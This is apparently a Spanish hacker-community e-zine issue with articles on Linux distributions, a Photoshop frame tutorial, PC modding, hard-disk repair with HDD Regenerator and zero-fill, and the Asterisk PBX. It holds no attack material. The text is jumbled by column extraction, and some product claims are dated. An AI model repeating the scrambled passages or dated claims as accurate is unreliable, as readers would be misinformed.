Si seleccionamos la opción Restaurar mi equipo a un estado anterior nos saldrá la siguiente pantalla dónde seleccionaremos la fecha a la cual queremos que sea restaurado el sistema:

Seleccionada la fecha de restauración el sistema nos avisa sobre la operación que vamos a realizar:

Esta ha sido una guía muy superficial de cómo usar las distintas herramientas administrativas que nos ofrece el Windows y nos ayudaran a manejar el Windows de una forma mucho más efectiva, espero que les sirva a muchos , Nos leemos en el próximo número del CUH e-zine. By Aleksteir.

CUH e-zine 2ª edicion

Guía Distribuciones Linux

Guia a distribuciones Linux

By LTSmash

algo complicado, ya que la mayoría de las distros tienen principios, metas y enfoques de forma que siempre hay algo para cada persona.

Guía a Distribuciones Linux Saludos amigos lectores. En esta ocasión voy a hablar de un tema que se complica demasiado a los novatos del sistema GNU/Linux, y es referente a las distribuciones y como elegirlas.

En el anterior articulo de la ezine hable somo el sistema GNU/Linux en general, y ahí hable un poco sobre las distribuciones. Sin embargo, a muchos no les ha quedado claro así que primero hay que tener clara la definición para después meternos con los detalles. “ Una distribución Linux o distribución GNU/Linux (abreviada con frecuencia distro) es un conjunto de aplicaciones reunidas que permiten brindar mejoras para instalar fácilmente un sistema operativo basado en programas de muchas fuentes y licencias de uso, que reciben la denominación convencional de GNU/Linux. Son variantes de sistemas libres del tipo GNU/Linux que, en general, se diferencian entre sí por las herramientas para configuración y sistemas de administración de paquetes de software para instalar. La elección de una distribución depende de las necesidades del usuario y de gustos personales. ” Entonces podría decirse en pocas palabras que una distro no es sino un “sabor” de GNU/Linux, habiendo cientos de estas para escoger según su uso y el usuario. Actualmente, uno de los “problemas” (que yo llamaría pretextos) que evitan que la gente migre a Linux es la variedad de distros existentes, lo que confunde y crea un caos en los usuarios ya que no saben que usar, muchas veces provocando que no les interese mas migrar. Sin embargo, elegir una distribución no debería ser

Segun www.distrowatch.com, hay 10 distribuciones mas importantes que son Ubuntu, Debian, Mepis, PCLinuxOS, Fedora Core, Slackware, Knoppix, Gentoo, Mandriva y FreeBSD. Sin embargo, yo hago un enfoque mas especial a las distros “madre”, que son 3 y de donde la mayoria surgió: Slackware, Red Hat Linux y Debian.

Distros Madre Slackware: Es una distro basada en el principio KISS (Keep It Simple Stupid), especialmente hecha con la simplicidad en mente. Es una distro para expertos que utiliza como gestor de paquetes el sistema TGZ que no tiene resolución de dependencias. Es la distro mas antigua en desarrollo.

RedHat® Linux: Una distro empresarial y comercial enfocada mas que nada a sistemas corporativos, creadora del sistema de administración de paquetes RPM con resolución de dependencias, fue muy

CUH e-zine 2ª edicion
popular en sus inicios y desplazó a Slackware entonces. No es gratuita (hay que pagar por el soporte), sin embargo hay una version comunitaria que es Fedora Core.

Guía Distribuciones Linux

La desconcertante elección entre un número siempre creciente de distribuciones de Linux puede crear confusión entre aquellos nuevos en Linux. Esta es la razón por la que se creó esta página. Listamos las 10 distribuciones que generalmente se consideran las más extendidas entre los usuarios de Linux de todo el mundo. Hay otras muchas que probar, y algunas pueden ser mas adecuadas para tus necesidades, pero como norma general, las presentes son poulares y tiene foros y listas de correo muy activas donde preguntar tus dudas si las tienes.

Debian: Una distro completamente libre, su nombre completo es Debian GNU/Linux. Es una distro muy popular por su sistema de paquetes con resolución de dependencias APT. Tiene 3 ciclos de desarrollo: estable, pruebas e inestable. Elección de una Distribución

Lycoris, Xandros y Lindows son consideradas las mejores para aquellos usuarios nuevos en Linux que quieren empezar a ser productivos con Linux lo antes posible sin tener que aprender todas sus complejidades. En el lado opuesto tenemos a Gentoo, Debian y Slackware que son distribuciones más avanzadas que requieren un completo aprendizaje antes de poder ser usadas eficientemente. Mandrake, Red Hat y SuSE se encuentran a medio camino entre ambas. Knoppix es un caso aparte, es genial para probar Linux sin tener que hacer nada, ya que funciona directamente del CD, si ninguna instalación. Estas distribuciones están listadas en orden de popularidad según DistroWatch, lo cual no es un indicador de su cuota de mercado o calidad. Como siempre, agradeceremos cualquier comentario o sugerencia.

Ahora ya conocemos un poco mas sobre distros, sin embargo, ¿Qué distro me conviene? Todo depende, las distros se pueden clasificar dentro de un “uso específico” y un “uso general”. Las distros de uso específico son distros especializadas para realizar determinadas tareas (ej. Editar multimedia, para realizar cálculos y simulaciones, para jugar, etc.) o bien las de uso general son aquellas con las que podemos hacer de todo. Si es una PC de hogar, lo recomendable es instalar una distribución sencilla como *Ubuntu, Mandriva, OpenSuSe, etc. O bien, si es una distro empresarial, podemos recurrir a RedHat Enterprise Linux, Novell SuSe, etc. Lo mas importante es si tienes la

Lista
• • • • • • • • • • Debian GNU/Linux Gentoo Linux LindowsOS Lycoris Dekstop/LX Knoppix Mandrake Linux Red Hat Linux Slackware Linux SuSE Linux Xandros OS Libranet

oportunidad de probar con varias distros lo hagas, y trabajar con lo que te sientas mas cómodo.

CUH e-zine 2ª edicion

Guía Distribuciones Linux

La popularidad del top 100 está dada por la cantidad de hits o visitas a las páginas que Distrowatch tiene de cada distribución 1 Ubuntu 2 Mandriva 3 SUSE 4 Fedora 5 MEPIS 6 Debian 7 KNOPPIX 8 Damn Small 9 Gentoo 10 Slackware 11 FreeBSD 12 Xandros 13 PCLinuxOS 14 Kubuntu 15 SLAX 16 CentOS 17 Vector 18 KANOTIX 19 PC-BSD 20 Linspire 21 Arch 22 Red Hat 23 Puppy 24 Zenwalk 25 VLOS 26 Yoper 27 aLinux 28 Ark 29 WHAX 30 GeeXboX 31 Solaris 32 IPCop 33 Feather 34 SME Server 35 Frugalware 36 Gnoppix 37 Devil 38 Vine 39 LFS 40 OpenBSD 41 Scientific 42 ClarkConnect 43 White Box 44 Symphony OS 45 Foresight 46 Kurumin 47 Turbolinux 48 NetBSD 49 Yellow Dog 50 Auditor

51 dyne:bolic 52 Aurox 53 Berry 54 Kate OS 55 AGNULA 56 Lunar 57 PHLAK 58 FreeSBIE 59 m0n0wall 60 BeatrIX 61 Onebase 62 Knoppix STD 63 SmoothWall 64 LiveCD Router 65 Trustix 66 Novell 67 Morphix 68 BLAG 69 rPath 70 MoviX 71 Mediainlinux 72 Gentoox 73 DragonFly 74 AUSTRUMI 75 Astaro 76 FoX Desktop 77 CRUX 78 Linux+ Live 79 BIG LINUX 80 Tao 81 Progeny 82 tinysofa 83 Overclockix 84 ADIOS 85 Lormalinux 86 Knopperdisk 87 Buffalo 88 T2 89 Linux4all 90 SAM 91 RR4/RR64 92 ParallelKnoppix 93 Source Mage 94 Lineox 95 CCux 96 YES 97 redWall 98 GobLinX 99 RIP 100 GoboLinux http://www.distrowatch .com/

CUH e-zine 2ª edicion

Guía Distribuciones Linux

CUH e-zine 2ª edicion

Marco Retro Style

Marco Retro Style
quedara así la firma:

By Logan_Doax

TUTORIAL MARCO RETRO STYLE Bueno, este tutorial les mostrara como hacer un marco con un estilo algo retro, el programa a utilizar es el Adobe Photoshop 9 CS2, pero se puede utilizar en futuras versiones como el CS3. Para empezar tienes que tener tu firma casi terminada como se ve en la siguiente imagen:

Ahora vamos al menú Edición y damos clic en rellenar. Saldrá el siguiente cuadro:

En mi caso la mía es de 400 * 150 píxeles. Aquí tengo hecha una firma del juego Devil May Cry 4, bueno no esta terminada, le aplicaremos un marco estilo retro. Para comenzar, vamos a utilizar la herramienta lazo poligonal y le ponemos Un calado de de 0 píxeles como se muestra en la imagen . Creamos una nueva capa dándole al botón nueva capa crear

Seleccionamos color, nos mostrara la paleta de colores y escogemos uno que le vaya ala firma; Y le damos clic a OK. Vamos al botón agregar estilo de capa , enseguida a opciones de fusión y le damos clic. Nos aparecerá el siguiente menú:

.y seleccionamos esta nueva capa.

Ahora comenzamos a hacerle a nuestra firma el marco con la herramienta lazo poligonal haciendo clic en cada lugar de la firma donde quieras hasta que termines de rodear toda la firma:

Después vamos al menú selección y a invertir, y nos

CUH e-zine 2ª edicion
Seleccionamos sobra paralela y le damos los siguientes valores:

Marco Retro Style

Como dije antes si los valores que hasta ahora llevo no les son de su agrado pueden ponerlos de acuerdo a que les quede a su firma, ya que no en todos es el mismo gusto. Nos vamos a bisel y relieve y ponemos los siguientes valores y le damos a OK:

Después sombra interior y le damos los valores siguientes o los que ustedes crean mejores para su firma:

Ahora vamos al menú selección y damos clic en deseleccionar, verán que la firma les ha quedado más o menos así:

Seguimos ahora con resplandor exterior con los siguientes valores:

Una vez que nos quede así, damos clic en el botón lazo poligonal y hacemos un rectángulo o alguna figura de nuestro agrado sobre un borde del marco de la firma. Y le damos a la tecla suprimir o supr de nuestro teclado. Esto ira cortándole al marco “pedazos” en forma de la figura que habíamos hecho con el lazo poligonal:

Después seleccionamos resplandor interior con los siguientes valores:

Recuerden que para hacer una nueva figura solo basta con deseleccionar la imagen hecha por ustedes con el lazo poligonal, pueden usar la herramienta marco elíptico

CUH e-zine 2ª edicion
O la herramienta marco rectangular . Y pues su creatividad no tiene limite la mía en algunos casos si, xD. Ya por ultimo agregando unos toques finales como texto y sus efectos quedaría así:

Marco Retro Style

Bueno eso es todo espero y les haiga agradado el tuto, y les diré el porque de su nombre “marco estilo retro”, le puse así (no quiere decir que yo lo haiga inventado) porque cuando comencé en diseño grafico fue el primer estilo de marco que aprendí y por ser algo un poco viejo; pues por eso le puse retro para que se vuelva a usar, xD. Autor: Logan_Doax Para: La CUH-Ezine Foro el-hacker.com

CUH e-zine 2ª edicion

Modding Gallery

Modding Gallery
muebles que lo rodean.

Editorial

Modding
Es el arte moderno de darle una apariencia original y personal a una computadora, es como hacerle l tunning a la PC. Por lo general poseen luces de neón, refrigeración con agua, un gabinete llamativo con distintas formas, etc.

El modding es personalizar los PC's añadiéndole, modificando o en muy raras ocasiones, sacándole partes, modificando la estructura de la caja, añadiendo componentes, modificando la forma de estos para obtener mayor espectacularidad y diseño, en definitiva es el arte de darle forma y color al PC poniendo en ello toda la imaginación que se pueda tener. También es modificar la velocidad de los componentes, como el FSB o el GPU Clock (llamado overclocking). El modding es modificar. No significa que si tomamos un teclado y le cambiamos las lucecitas o lo pintamos de dorado seremos expertos del modding. Este arte lleva su tiempo, es difícil decidir lo que uno va a hacer con el PC.

El "modding" es el arte o técnica de modificar estética o funcionalmente partes de un ordenador, ya sea el gabinete, mouse, teclado o monitor. A todo el que practica o hace el modding se le llama "modder". Sin embargo, la palabra modding se suele usar frecuentemente para las modificaciones realizadas a un ordenador o a algo relacionado con él, como son los periféricos, accesorios e incluso

Las modificaciones más comunes que hoy en día se realizan a los ordenadores son: • • • Sustitución de diodos LED por otros más potentes o catodos fríos de diferentes colores. Sustitución de cables IDE por Cables IDE redondeados y/o reactivos al UV (mejoran la refrigeración del gabinete) Pintado interior o exterior (incluidos

CUH e-zine 2ª edicion
• • • • • • componentes electrónicos). Construcción de ventanas para hacer visible el interior o conseguir un efecto estético (con metacrilato). Construcción de blowholes (entradas o salidas de aire con ventiladores de fácil acceso). Colocación de ventiladores para mejorar la refrigeración de los componentes electrónicos. Colocación de un BayBus externo (controlador de los ventiladores que hay en el interior del gabinete) Colocación de elementos de iluminación interior y a veces exterior. Construcción de elementos para monitorizar las temperaturas de los componentes electrónicos o controlar la velocidad de los ventiladores (Baybus, Fanbus, Rheobus). Sustitución total o parcial de los elementos de refrigeración convencional por elementos de refrigeración silenciosa o pasiva, refrigeración líquida o la más reciente refrigeración por evaporación. Esta última se la conoce actualmente como "Heat - Pipes". Construcción o colocación de algún elemento original que le dará el estilo único (Rejillas, bordados,logotipos,etc).

Modding Gallery

que dicen que "es posible hacerle tuning al pc muy fácilmente" o "tuning de windows". Otro error frecuente es, por ejemplo, hay una persona levantando el gabinete y te dice: "¿Dónde te dejo el CPU?. Esta pregunta es errónea porque al decir esto nos estamos refiriendo al procesador que es varias

de veces más chico que el gabinete. Para tranquilizarnos un poco, nosotros no somos los únicos que cometemos errores: muchas veces les habrá pasado que no tienen el teclado y les dice: "No keyboard present. Press F1 to continue".

La persona que se dedica al modding (por hobby o por trabajo), es decir, el modder, le molesta que le digan que en su PC le han hecho TUNING. Este concepto es erróneo, ya que justamente se ha creado la palabra modding para hacer referencia sólo a los PC, en cambio el tuning es para los autos. Este error los están cometiendo las revistas de computación

CUH e-zine 2ª edicion

Modding Gallery

Consecuencias del modding
En general, los modders más expertos son los que tienen más de una computadora en sus casas y no temen que se rompan o si eso ocurre, sólo será un raspón para ellos. Esto en parte es cierto, no hay que arriesgarse innecesariamente, pero hay que tener algunos cuidados al momento de hacer un modding. Los menos arriensgados son en los que el periférico que queremos agregar no lo debemos construir y sólo debemos agregarlo conectarlo y listo. Los más arriesgados son en los que uno mismo debe crear sus periféricos y agregarlos, ya que si algo sale mal, no le podremos echar las culpas a nadie.

CUH e-zine 2ª edicion

Estructura física del HD

Estructura Fisica del Disco Duro

By Locutus

grupos tracks alineados forman lo q c llaman cilindros.

Estructura física del HD El disco rigido o hd (hard drive) guarda los datos d la misma forma q 1 cassette, a traves d tecnicas d almacenamiento magnetico. Esto hace q los datos sean muy faciles d manipular, ademas d q los patrones c guardan durante mucho tiempo, d manera q la unica forma d estar seguros d eliminar definitivamente y efectivamente todos los datos es destruirlo físicamente (o casi)... esto es lo q hace posible q c puedan recuperar datos después d borrados accidentales, formateos y cosas peores... ;) La placa logica o controladora del hd c encarga d mandar al/los cabezales las instrucciones para convertir bytes en patrones magneticos para grabar datos y el proceso inverso para llevar los datos del hd al cpu.

Cuando c graban datos los platos giran a gran velocidad pasando bajo los cabezales d grabación q producen 1 campo q magnetiza la region donde c tienen q grabar los datos. Durante este proceso la superficie adquiere 1 patron representativo d la información q debe ser guardada. Hasta aca todo muy lindo... esta seria la situación teorica digamos, pero como sabemos las cosas tienen 1 desgaste y como consecuencia sufren daños. 1 d los daños + comunes q podemos ver en los rigidos son los sectores dañados o “bad sectors”, estos son sectores q no pueden ser accedidos debido a daños “permanentes” a la superficie d alguno d los platos. Los hds modernos vienen con sectores d repuesto. Cuando 1 sector malo es detectado x la controladora, esta remapea el sector lógico a 1 posicion física diferente; esto es completamente transparente para el resto del sistema. Cuando el SO (sistema operativo) empieza a detectar “bad sectors” x lo gral es xq la superficie esta dañada y el disco c quedo sin sectores d repuesto. HDD Regenerator Esto nos lleva a nuestra proxima utilidad del hiren’s, el HDD Regenerator, 1 soft q promete algo q parece imposible cuando lo escuchamos x 1era vez.... “regenerar los sectores dañados”. La verdad q la 1era vez q lo vi no le di mucho credito a la explicación y pense q era simplemente otro soft d reparación d hds

La superficie magnetica d los discos c divide en tracks, q estan formados x circulos concéntricos invisibles, y sectores, q son divisiones dentro d los tracks. Los datos c empiezan a grabar desde el borde exterior hacia el interior, d manera q el

exterior es el track 0. A causa d estar las cabezas unidas x 1 brazo es imposible q 1 lea el track 20 en 1 plato y la otra el 587 en el otro, todas quedan clavadas en el mismo lugar leyendo el mismo track pero d su plato. Estos

CUH e-zine 2ª edicion
prometiendo cosas imposibles pero los resultados me hicieron cambiar d opinión muy rapido. Según la pagina del soft casi el 60% d los discos rigidos afectados con sectores dañados poseen una incorrecta magnetización de la superficie del disco, para solucionar esto dicen haber desarrollado 1 algoritmo q es usado para reparar las superficies dañadas. Esta tecnología sector.

Estructura física del HD

En la pantalla d arriba (la 2da del prog) nos pide q ingresemos el sector desde el q queremos q empiece a scannear, enter para arrancar desde el sector 0. Esto es bastante util cuando tenemos 1 disco muy grande o muy dañado y x alguna razon tenemos q detener (o c detiene x esas cosas q pasan) el proceso en el medio. En este caso tenemos 1 hd d 2Gb o sea los 2047mb q vemos en la captura, lo q equivale a 4194288 sectores. Si dejamos 1 restauracion x la mitad todo lo q tendríamos q hacer es ingresar después en s campo hasta q sector llego la anterior. A continuación vemos la pantalla d trabajo del prog:

es independiente del hardware, soporta muchos tipos d discos y repara daños q ni siquiera puede hacerlo 1 formateo d “bajo nivel” (en realidad c refiere al “zerofill”, q vemos + adelante). Como resultado, información previamente ilegible sera restaurada. Por la forma en q la reparación es hecha la información existente en el disco no c ve afectada.
Después aclara q “dado q el programa no cambia la estructura logica del disco el sistema puede mostrar aun algunos sectores anteriormente marcados como “bad” y otras utilidades d disco como scandisk detectaran sectores lógicos dañados aun cuando el disco ha sido exitosamente regenerado y ya no esta afectado x sectores dañados físicamente. Si ud quiere remover estas marcas, reparticione el hd...” o sea q tendríamos q volver a formatear el disco para q actualize la info d los sectores dañados. Vamos entonces a ver el soft q es bastante facil d usar. En la 1er pantalla nos dice q los hds q reconoce en el sistema y nos pide ingresar cual es el q queremos reparar. Si localiza solamente 1 avisa y pide cualquier tecla para seguir. Después vemos esta pantalla:

Si cortaramos la regeneracion en este punto podriamos después lanzarla como deciamos antes en el sector 1577000 para continuar desde el punto en q habiamos dejado antes. No tenia ningun disco con “bad sectors” a mano asi q no pude sacar captura d 1 falla... ;) Cuando en prog encuentra 1 sector malo van a ver q aparece 1 B roja como la q c puede ver en el extremo inferior izq d la pantalla, si el sector es recuperado la B cambia x la R celeste de “recovered”. No sean impacientes al correrlo, puede tardar horas el proceso según el estado del disco. Algunas veces tuve q dejarlo corriendo d 1 dia para el otro y algunas otras tuve q pasarlo 2 o 3 veces antes d recuperar completamente el disco pero les aseguro q es verdad q arregla + d la mitad d las fallas d este tipo... x supuesto q muchas veces hay q combinarlo con “formateos d bajo nivel” (ya lo vemos) o alguna otra cosa pero el trabajo q hace el soft es muy bueno... 1 herramienta infaltable... ;) Formato de bajo nivel o relleno d ceros?? (zerofill) Xq el titulo diran? Q es zerofill? Q es 1 formato d bajo nivel? Vamos x partes... En la antigüedad (si podemos llamar antigüedad a hace 10 o 15 años xD) era bastante comun el formateo d bajo nivel para reparar problemas

Para los q no leen ingles... “HDD Regenerator permite reparar sectores malos en discos dañados sin perdida d datos existentes. El mismo ignora el sistema d archivo y puede ser usado tanto con discos sin formato como discos formateados con FAT, NTFS o cualquier otro sistema d archivos”. El regenerator no para a fijarse en sistemas d archivos ni le interesa, trabaja completamente a nivel d hard... sector x

CUH e-zine 2ª edicion
con los rigidos... en la actualidad prácticamente no es necesario, salvo en casos extremos, y las utilidades q dicen hacer 1 formateo d bajo nivel (maxblast, seatools, dlg, etc) lo q en realidad hacen es 1 “zerofill”... o sea llenar el disco con ceros. Hay básicamente 2 tipos d formateo, el formateo d alto nivel (o lógico) es el + comun, es el q hacemos al hacer el tipico “format c:” desde la consola o el clic derecho del explorador d win. Este formateo lo q hace es armar el sistema d archivos q vamos a usar para q el SO pueda grabar o leer desde el. El formato depende del SO q instalemos ya q cambia según el mismo pudiendo haber distintos sistemas d archivos en 1 SO. El formateo d bajo nivel (o fisico) vuelve a crear la estructura física del disco d la q hablábamos anteriormente (tracks, sectores, etc) desde 0, dejando el disco igualito a como salio d fabrica... como siempre todo muy lindo hasta q lo llevamos a la practica... ;)

Estructura física del HD

q c me ocurrio... moraleja? Piénsenlo 2 veces si no estan seguros. ;) En resumen, en la actualidad la mayoría d los softs q dicen hacer este tipo d formato lo único q hacen es 1 “zerofill” o relleno con ceros y los q lo hacen verdaderamente casi nunca son completamente necesarios y no es para nada aconsejable q el usuario final c meta con estas cosas. El zerofill, aunque no rehace la estructura como lo haría el formateo, es muy efectivo ya q borra efectivamente todo dato q haya en el disco incluyendo cualquier tipo d virus, problemas d partición, etc. Volvamos al Hiren’s entonces... dentro del menu d “Hard Disk Tools” vamos a “Next” y nos salen las utilidades d la mayoria d las marcas conocidas d hds:

Lo cierto es q a pesar d q la estructura d los discos es casi la misma, cada fabricante varia algo para optimizarla y sacarle todo el jugo... entonces si usamos 1 herramienta genérica para formatear a bajo nivel lo + probable es q el disco funcione + lento y hasta no arranque. En el setup d algunos mothers viejos (286, 386) venia 1 utilidad genérica para hacerlo, los discos en esa época eran mucho + primitivos y con capacidades d 20 o 40mb ademas d q tenian 1 parametro para el formateo llamado “interleaving”... es muy largo d explicar pero los discos giraban + rapido d lo q el sistema podia asimilar la info, entonces el interleaving era algo asi como 1 num X d vueltas q daba el plato entre q la logica leia info, la mandaba al micro y volvia a leer... :P ... primitivo no?... El tema es q me acuerdo d haber metido 1 disco d 540mb en 1 d esas y formatearlo a bajo nivel... x supuesto q 540mb era prácticamente lo mismo q 80gb para el pobre mother q no entendía nada... je... le puse interleaving d 0 para empezar a probar. Q paso? Todavía debe andar x ahí tirado... nunca + arranco x + q lo volvi a formatear unas cuantas veces cambiando todo lo

no los voy a explicar 1x1 xq todos hacen casi lo mismo y son muy faciles d utilizar. Básicamente lo q hacen es reconocer el disco, dar info sobre el mismo, testear en busca d errores y el famoso “zero fill”. Algunos como el powermax (para Maxtor) tienen 2 opciones para zerofill... en este x ej tenemos 1 formato quick, q solo llena con ceros los 1eros 300mb y los últimos 100, y uno completo q llena todo el disco. Siempre c debe usar la herramienta especifica del disco q tiene el problema, como dijimos antes cada fabricante tiene distinta forma d organizar el hd y usar 1 generico o d otra marca d disco puede traer resultados bastante malos... ;) Como habíamos dicho al principio la info queda en el disco después d formateos normales (d alto nivel), borrados d particiones o archivos, etc. El proceso del zerofill asegura q todos los datos del disco fueron borrados d manera q si quieren estar seguros d hacer desaparecer algo esta es una d las maneras + efectivas. Creo q ya es suficiente con los hds, asi q a – q c me ocurra algo bien interesante en el prox num vamos a seguir con otra cosa para no aburrir... aunq sobre rigidos c podrían escribir libros enteros. ;) |_ocutus

CUH e-zine 2ª edicion

Asterisk

ASTERISK

By JUCA

Para conectar teléfonos normales analógicos hacen falta unas tarjetas telefónicas FXS o FXO fabricadas por Digium o por otros fabricantes, ya que para conectar el servidor a una línea externa no vale con un simple módem. HISTORIA Asterisk, la aplicación de centralita telefónica PBX bajo licencia GPL, fue desarrollada por Mark Spencer, entonces estudiante de ingeniería informática en la Universidad de Auburn, Alabama. Mark había creado en 1999 la empresa "Linux Support Services" con el objetivo de dar soporte a usuarios de Linux. Para ello necesitaba una centralita telefónica, pero ante la imposibilidad de adquirirla dados sus elevados precios, decidió construir una con un PC bajo Linux, utilizando lenguaje C. Posteriormente "Linux Support Services" se convertiría en el año 2002 en "Digium", redirigiendo sus objetivos al desarrollo y soporte de Asterisk. QUE ES ASTERISK Asterisk es una aplicación software libre de una central telefónica (PBX). Como cualquier PBX, se puede conectar un número determinado de teléfonos para hacer llamadas entre sí e incluso conectar a un proveedor de VoIP o bien a una RDSI tanto básicos como primarios. Asterisk tiene licencia GPL. Originalmente desarrollado para el sistema operativo GNU/Linux, Asterisk actualmente también funciona en BSD, MacOSX, Solaris y Microsoft Windows, aunque la plataforma nativa (GNU/Linux) es la mejor soportada de todas. Asterisk incluye muchas características anteriormente sólo disponibles en caros sistemas propietarios PBX: buzón de voz, conferencias, IVR, distribución automática de llamadas, y otras muchas más. Los usuarios pueden crear nuevas funcionalidades escribiendo un dialplan en el lenguaje de script de Asterisk o añadiendo módulos escritos en lenguaje C o en cualquier otro lenguaje de programación soportado por Linux. comercializan soluciones de VoIP Hw/Sw de alta calidad como Alcatel, Cisco, Avaya ó Nortel, Asterisk se empieza a adoptar en algunos entornos corporativos como solución de bajo coste junto con SER (Sip Express Router) Quizá lo más interesante de Asterisk es que soporta muchos protocolos VoIP como pueden ser SIP, H.323, IAX y MGCP. Asterisk puede interoperar con terminales IP actuando como un registrador y como gateway entre ambos. Lejos de poder competir con las compañías que

SERVICIOS Asterisk provee los siguientes servicios: • VoiceMail ( Buzón de Mensajes ) ( Servicio de

• Call Conferencing Conferencia )

• Interactive Voice Response and Call Queuing (Sistemas de Audio Respuesta y Cola de Llamadas )

CUH e-zine 2ª edicion
• Caller ID ( Identificador de Llamada )

Asterisk

Asterisk puede funcionar como cualquier centralita tradicional, e incorpora todas sus funcionalidades. • Conexión con líneas de telefonía tradicional, mediante interfaces tipo analógico (FXO) para líneas de teléfono fijo o bien móvil y RDSI (BRI o PRI). • Soporte de extensiones analógicas, bien para terminales telefónicos analógicos, terminales DECT o bien equipos de fax. • Soporte de líneas (trunks) IP: SIP , H323 o IAX. • Soporte de extensiones IP: SIP SCCP , , MGCP H323 o IAX. , • Música en Espera basada en archivos MP3 y similar. • Funciones básicas de usuario: o Transferencias consultiva) o Desvíos (de grupo o de (directa o

reunión virtual y suministra la correcta gestión y control de los usuarios que se incorporan a ella. • IVR: Operadora Automática. Sistema automatizado de respuesta que permite redirigir las llamadas entrantes en función de las opciones seleccionadas por el llamante. • Informes detallados de llamadas (CDR): Detalle de llamadas realizadas/recibidas por extensión, para imputación de costes departamentales, por cliente o incluso para facturación. • ACD: Sistema Automático de Distribución de Llamadas entrantes. Pensado para Centros de Llamadas para atención comercial o soporte técnico. • CTI: Integración con sistemas de gestión comercial o de atención a cliente (CRM). • IPCC (IP Contact Center): Integración con sistemas avanzados de gestión de centros de llamadas, vía soluciones abiertas o propietarias. Asterisk no necesita ningún hardware adiciona para el servicio de voz sobre IP. Asterisk soporta una gran variedad de hardware de distintos proveedores para la interconexión con los sistemas de tecnología tradicional o red de telefónica publica, entre los que se encuentran tarjetas con soporte para líneas T1 , E1 , RDSI PRI , RDSI BRI y tarjetas de una sola línea o puerto FXO. Asterisk provee todas las características de un PBX tradicional y mucho mas ya que puede integrar toda su red de telefónica corporativa localizada en distintos puntos utilizando la red Internet y hacerla ver como un PBX único. PROTOCOLOS & CODECS

o Capturas extensión) o

Conferencia múltiple de llamadas

o Aparcamiento (Call parking) o

Llamada directa a extensión

o Retrollamada (llamada automática disponible)1.

Callback
cuando

o Paging - Megafonía a través del altavoz del teléfono2 o Funciones avanzadas El sistema incorpora asimismo muchísimas funcionalidades avanzadas que tendrían un elevado coste en sistemas tradicionales propietarios. • Buzón de Voz: sistema de contestador automático personalizado por usuario. Se integra con el sistema de directorio (LDAP) y con el email. • Sistema de Audio conferencias: Sistema que permite la conexión remota de diferentes usuarios que quieren mantener una DND

PRINCIP ALES VENTAJAS

CUH e-zine 2ª edicion
Funcionalidad Asterisk dispone de todas las funcionalidades de las grandes centralitas propietarias (Cisco, Avaya, Alcatel, Siemens, etc). Desde las más básicas (desvíos, capturas, transferencias, multi-conferencias) hasta las más avanzadas (Buzones de voz, IVR, CTI, ACD…). Escalabilidad El sistema puede dar servicio desde 10 usuarios en una sede de una pequeña empresa, hasta 10.000 de una multinacional repartidos en múltiples sedes. Competitividad en coste No solo por ser un sistema de código abierto (Open Source) sino gracias a su arquitectura hardware: utiliza plataforma servidor estándar (de propósito no específico) y tarjetas PCI para los interfaces de telefonía, que por la competencia del mercado se han ido abaratando progresivamente. Interoperatibilidad y Flexibilidad Asterisk ha incorporado la mayoría de estándares de telefonía del mercado, tanto los tradicionales (TDM) con el soporte de puertos de interfaz analógicos (FXS y FXO) y RDSI (básicos y primarios), como los de telefonía IP (SIP H.323, MGCP SCCP/Skinny). Eso , , le permite conectarse a las redes públicas de telefonía tradicional e integrarse fácilmente con centralitas tradicionales (no IP) y otras centralitas IP . Estado actual La versión estable de Asterisk está compuesta por los módulos siguientes: • • • • • Asterisk: Ficheros base del proyecto. Zaptel: Soporte para Drivers de tarjetas. hardware. Versión analizada

Asterisk

En las versiones de desarrollo el tercer valor siempre es un cero, seguido de la palabra "beta" y un número, para indicar la revisión. Radiografía A continuación se presentan dos cuadros con algunos datos y cifras de la aplicación. Estos datos se han obtenido aplicando el modelo COCOMO. Aunque este modelo se aplica habitualmente a procesos "clásicos" de producción de software, y en consecuencia las cifras obtenidas han de tomarse con precaución, permite hacerse una idea del tamaño del proyecto y el coste que podría haber alcanzado en caso de haber sido construido como software propietario. Resumidamente, en el cálculo de costes se han tenido en cuenta dos factores, el salario medio de un desarrollador, cifrado en 56.286 $/año, y el coste que toda empresa tiene que afrontar, además de los sueldos de los programadores, para lanzar un producto al mercado. Estado actual de Asterisk

Página web

http://www.asterisk.org/

Inicio del proyecto

1999

Version 1.4.0 - Diciembre 2006

Líneas fuente

de

código

250.463

Addons: Complementos y añadidos del paquete Asterisk. Opcional. Libpri: Soporte para digitales. Opcional. conexiones

Esfuerzo estimado de desarrollo (persona/año persona/mes)

66,03 - 792,30

Sounds: Aporta sonidos y frases en diferentes idiomas.

Estimación de tiempo (años)

2,63

Cada módulo cuenta con una versión estable y una versión de desarrollo. La forma de identificar las versiones se realiza mediante la utilización de tres números separados por un punto. Teniendo desde el inicio como primer número el uno, el segundo número indica la versión, mientras que el tercero muestra la revisión liberada. En las revisiones se llevan a cabo correcciones, pero no se incluyen nuevas funcionalidades.

Estimación número desarrolladores paralelo

de de en

25,08

Coste total estimado

8.919.128 $

CUH e-zine 2ª edicion

Asterisk

TARJETAS DE COMNICACIONES

P ARTES DE ASTERISK

COMPONENTES DE ASTERISK SOLUCIONES ASTERISK

EQUIPAMIENTO PARA VoIP

Espero les haya gustado. En la siguiente entrega hablaremos de la instalación de la herramienta….. TERMINALES www.hackeruna.com Escrito por JUCA

CUH e-zine 2ª edicion

Introducción a la Electrónica

Introducción a la Electrónica
Resistores:

By Elektro

Hola, gracias por estar de vuelta por mi sección! Bueno, en la anterior entrega aprendimos un poco sobre los principios físicos que rigen la electricidad, conceptos necesarios para poder adentrarnos más profundo en el fascinante mundo que existe dentro de nuestras PCs y casi en todo lo que nos rodea hoy en día.

Su símbolo es: Son materiales conductores, pero no tan buenos como el cobre u otros conductores que conocemos, por lo que tienen la propiedad de “limitar” la circulación de los electrones a través de ellos. Es decir, un resistor hace que los electrones reduzcan su velocidad al atravesarla y según lo que vimos antes esto es lo mismo que decir que limitan la “corriente eléctrica” del circuito en el cual se los incorpora.

En esta figura podemos ver el aspecto de un resistor y su codificación, siendo componentes pequeños y muchas veces ubicados en lugares de no muy fácil acceso, los resistores usan para identificar su valor un código de colores, que está distribuido como se ve en la figura y que es el siguiente:

